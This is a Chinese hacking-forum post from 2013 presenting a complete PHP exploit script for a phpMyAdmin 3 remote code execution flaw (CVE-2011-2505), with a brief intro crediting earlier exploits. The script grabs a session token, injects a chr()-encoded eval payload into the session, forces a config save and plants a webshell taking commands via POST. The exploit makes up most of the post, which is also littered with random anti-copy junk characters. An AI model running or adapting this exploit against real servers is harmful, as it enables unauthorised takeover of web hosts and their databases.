找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2209|回复: 0
打印 上一主题 下一主题

phpadmin3 remote code execute php版本exploit

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
4 f9 `; O. @* q/ Y! h$ m! j
8 W8 C9 o( u! q2 R: C昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。0 E) ?2 m$ i/ |( H

3 |1 C" y$ k& P1 {首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
" _) y) |& q9 s) Q" N" w' U, u一是session.auto_start = 1;
8 o! ~3 e* c+ B" s二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。3 U8 n7 k$ p1 g3 `( a; U" Q: Q
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。. P7 O7 p- j, T$ {6 ]
- S# L. [: }( S& ^
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
# C# |# W( G! `) s6 `" U
9 q# P! g" ?& r& C于是写了这个php版本的exp,代码如下:, i, r5 G+ ]3 l$ q% Z; K( u1 Z5 E

( |& _( i1 [  I, a- J+ D0 X#!/usr/bin/php
. W/ q& r. E# l<?php
  e5 b% Z$ H2 D+ ]9 P& rprint_r('
' R+ q$ d0 B* h. h. o5 m# M+ O+---------------------------------------------------------------------------+
1 i1 o9 H. c0 i% Mpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
- l$ d0 |2 t% I* ~. Uby oldjun(www.oldjun.com)  t! I2 H$ F4 q; Q. t5 [1 ^
welcome to www.t00ls.net
7 N0 Q% O- Z' b1 X0 q. n/ omail: oldjun@gmail.com- X! v  x" T1 A
Assigned CVE id: CVE-2011-2505
; L$ N/ j* j2 n+---------------------------------------------------------------------------+! v/ v* J- X9 g! E' K; R
');( ~# c/ x2 J8 k( f+ g% i/ \

: R8 v  S4 o5 g; B9 G  F/*** J* u- D7 L1 Y, T6 q" J" h3 q6 f
* working when the directory:"config" exists and is writeable.
2 v% y5 U, Y. c2 e7 E& D**// V4 i( h' n" N4 G; H& k1 ^7 e9 d
# q) q: v9 _( L8 g0 t
if ($argc < 3) {: j8 ~$ O& j' Z$ f, ?4 f& U
    print_r('
* v  H& m# o. e7 \4 s$ v: w+---------------------------------------------------------------------------+
! ]6 E$ v% ~8 l8 R& IUsage: php '.$argv[0].' host path3 X; a* T3 j" G, B
host:      target server (ip/hostname)# @9 U8 P/ U3 r3 Y( f" u' [8 }
path:      path to pma3% u5 J: i2 H* S" E. H' Z
Example:
9 w+ r) ?7 ?. m8 C' ~5 ophp '.$argv[0].' localhost /pma/
* E8 h' B( g7 k* l+---------------------------------------------------------------------------+; }1 X5 Q) M4 f$ m
');. i2 P: y2 x2 S/ K
    exit;  r% A# E: F1 U) S, g: X
}( W% d# q: Z  x3 Y
, V% O  ?7 t( B: C( G7 T( c8 \
$host = $argv[1];% O) h& s3 ?5 \+ k7 |/ p8 I. t
$path = $argv[2];' C0 _& U' a2 |, m5 ~# M% w

2 K, }# ~1 M$ n' s7 [" k, r; V7 f/**: j4 k! i, h, t1 k* N+ m( _
* Try to determine if the directory:"config" exists1 U; {$ l5 u+ Y
**/2 S0 \" |& W' P- c& s2 `
echo "[+] Try to determine if the directory:config exists....\n";
. Q" r* M4 V1 ~& Y' b1 ?. x$returnstr=php_request('config/');
0 j3 ~  t8 v, a6 Jif(strpos($returnstr,'404')){0 ?- k) q# U; P) C
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
% S3 i( O( y0 D6 N! i% Q}
$ w; [9 W7 j; r+ q, G! ~. M/ {/ ]- a, w$ I$ ?4 v9 Y# ]
/**
- ^9 S  L" F) j# ? * Try to get token and sessionid2 D: [0 Q% i" v
**/
# s& Y4 _4 D% t/ Y. ?echo "[+] Try to get token and sessionid....\n";
* u: T+ O6 S/ J5 C8 k, A$result=php_request('index.php');
- o* v7 F; \9 F7 L! _; B6 F. Upreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);8 V- A! r7 q0 F0 l/ r: t  s
$token=$resp[3];
! V' V2 X8 x: o  J& t0 q/ e# b$sessionid=$resp[1];0 W) z2 s0 o) i! [( ^' [
if($token && $sessionid){
! T( Y+ f3 S1 A4 }& R    echo "[+] tokentoken\n";& I6 Y$ P# @* k, \
    echo "[+] Session IDsessionid\n";
3 }4 }" f5 H# C- S0 b% M! m}else{# T5 X( C2 p5 t
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
* W+ z0 e. T# V& y}& N2 |" X  G0 Q! o& m0 |7 _! R- t  w9 {
' S7 }7 a8 j  K2 l
/**
6 |8 r( d( c. q$ K- K  M$ N) f * Try to insert shell into session
9 b) v# Y( J% O**/
# v- T+ X+ [6 M9 Oecho "[+] Try to insert shell into session....\n";
' v1 G% X3 q+ |3 C5 s& e& zphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
, Q3 O3 C; P/ ]3 A. u3 A/ {5 a: t7 W; _* r3 n
/**
1 A+ ~% E/ ^- z' A) e/ R$ g9 A/ Y+ q * Try to create webshell
% g- ]+ R5 H; l1 X: Q2 c4 g**/, l4 a2 S# u' l0 e0 a& D  T$ u$ l
echo "[+] Try to create webshell....\n";
1 W. {: X5 k5 \* }+ Xphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
$ \1 T' q* w" J1 F5 u+ [# Z' {/**/ S  w7 N0 \$ i* t1 S# O/ e7 Z
* Try to check if the webshell was created successfully: L8 {+ T7 s9 X5 O( ^  ~
**/2 p% X1 v% }$ a& f" V1 P
echo "[+] Try to check if the webshell was created successfully....\n";
6 O$ q- ?! i: ~$content=php_request('config/config.inc.php');
& W5 g; _$ T  s* ?1 I4 pif(strpos($content,'t00ls')){0 m) x+ ]3 u% G' _$ ^: F5 n
    echo "[+] Congratulations! Expoilt successfully....\n";
3 l3 G0 T7 s0 a    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
2 j* j. f( \9 |; _9 P7 q' l}else{8 y# B; d% J" i9 o
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");' z% C( D+ k! d( G8 ~- i
}
7 L; r! Q+ U) e- o3 S+ ^6 q% p3 g9 [3 ?0 g. A. q
function php_request($url,$data='',$cookie=''){# c) b& U1 a; d* }- m& ?
    global  $host, $path;# G' D! z$ w" X, H- K) W" _6 e
    5 [5 y4 Z) k% P  g9 V# E5 F2 [, u
    $method=$data?'POST':'GET';; W7 n6 m5 r; O8 A
    ) t. G. v8 x. D# K7 |
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
, E* E8 Z' g$ U% J3 G3 L& _  a    $packet .= "Accept: */*\r\n";5 `* V- g# y4 y( \/ W
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
% D6 u0 Z6 ~& a8 e8 `: Q    $packet .= "Host: $host\r\n";9 v" q$ T/ \( W' L, t
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";2 w, g/ t0 w8 \
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
- z5 ?- A! J' w6 A0 ?7 {    $packet .= $cookie?"Cookie: $cookie\r\n":"";( o1 H& Z$ M+ N7 V2 j* |
    $packet .= "Connection: Close\r\n\r\n";4 |% I5 C; c( u, L0 H5 y
    $packet .= $data?$data:"";7 e: _2 M6 M1 S: o# D$ S: n  Q& W
: `5 X4 \% `, a" k
    $fp = fsockopen(gethostbyname($host), 80);
8 A+ l2 J) `1 V( e. d4 v    if (!$fp) {
: w3 V: [8 f# j8 d9 y' H    echo 'No response from '.$host; die;
2 P* \7 i7 A* T, w: e, }+ m    }
7 F8 o& I( K9 r5 w2 T    fputs($fp, $packet);7 {+ y- N" ?8 t  Y  Y: d
. n* X; w! J- j
    $resp = '';) l! }! N5 t/ _  `0 `0 F0 b

. a+ p0 |% o. M6 I6 }8 P    while ($fp && !feof($fp))
# v. Q& U  ~1 g3 g        $resp .= fread($fp, 1024);' w+ N! j% c1 n4 q

# w* r2 \8 z7 i" Q# P    return $resp;
0 N5 a, ?5 Z; R* s}0 p& Y) S5 N1 G! h) \, c
    ' r/ e) K3 b8 J
?>
  G' g  p4 V# ]/ e+ g% ~( b0 N.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表